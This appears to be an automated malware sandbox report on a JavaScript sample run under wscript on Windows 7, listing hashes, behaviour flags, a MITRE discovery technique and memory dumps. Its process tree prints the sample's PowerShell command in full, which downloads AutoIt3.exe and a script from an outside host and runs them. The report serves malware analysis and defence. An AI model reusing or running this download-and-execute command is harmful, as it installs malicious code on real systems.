bf1fee6da10b755d5aa10012792f823a3462759f9f68966e1b9449f9d42afee5

Analysis

max time kernel
118s
max time network
122s
platform
windows7_x64
resource
win7-20231023-en
resource tags

arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
submitted
09-11-2023 02:23

Target

aff263702a19eb6640636f8c2708147a5ce8a5577d86a57224ddbe0f51c7dafe.js
Size

252KB
MD5

9edd0adf749c9406b020d9ca613daa62
SHA1

701cc4130fd3b8b17d6692101b7bd80d9a14b68c
SHA256

aff263702a19eb6640636f8c2708147a5ce8a5577d86a57224ddbe0f51c7dafe
SHA512

99df3475b72b2576123a7a46338470346b30e6ac10d9bd8506c6b359de2bf7308d0d85ece3039f3388d6feed7a6e7774eb4300c4ecc4435bf6361e59ab8e52da
SSDEEP

6144:ge7hgXeerjqlI2Iro+ra4xB9ElITe7hgXeerjqlI2Iro+8:gIhgSlI23qa4xB9ElITIhgSlI23V

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2012	powershell.exe
2012	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2012	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2560 wrote to memory of 2012	2560	wscript.exe	28
PID 2560 wrote to memory of 2012	2560	wscript.exe	28
PID 2560 wrote to memory of 2012	2560	wscript.exe	28

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\aff263702a19eb6640636f8c2708147a5ce8a5577d86a57224ddbe0f51c7dafe.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2560
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://siliconerumble.com:443' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://siliconerumble.com:443/msijhoziucv' -OutFile 'jhoziucv.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'jhoziucv.au3'"; Stop-Process -Name "WScript"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2012

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

memory/2012-4-0x000000001B330000-0x000000001B612000-memory.dmp

Filesize
2.9MB

Download
memory/2012-5-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

Filesize
32KB

Download
memory/2012-6-0x000007FEF52B0000-0x000007FEF5C4D000-memory.dmp

Filesize
9.6MB

Download
memory/2012-7-0x00000000026B0000-0x0000000002730000-memory.dmp

Filesize
512KB

Download
memory/2012-8-0x00000000026B0000-0x0000000002730000-memory.dmp

Filesize
512KB

Download
memory/2012-9-0x00000000026B0000-0x0000000002730000-memory.dmp

Filesize
512KB

Download
memory/2012-10-0x000007FEF52B0000-0x000007FEF5C4D000-memory.dmp

Filesize
9.6MB

Download
memory/2012-11-0x00000000026B0000-0x0000000002730000-memory.dmp

Filesize
512KB

Download
memory/2012-12-0x000007FEF52B0000-0x000007FEF5C4D000-memory.dmp

Filesize
9.6MB

Download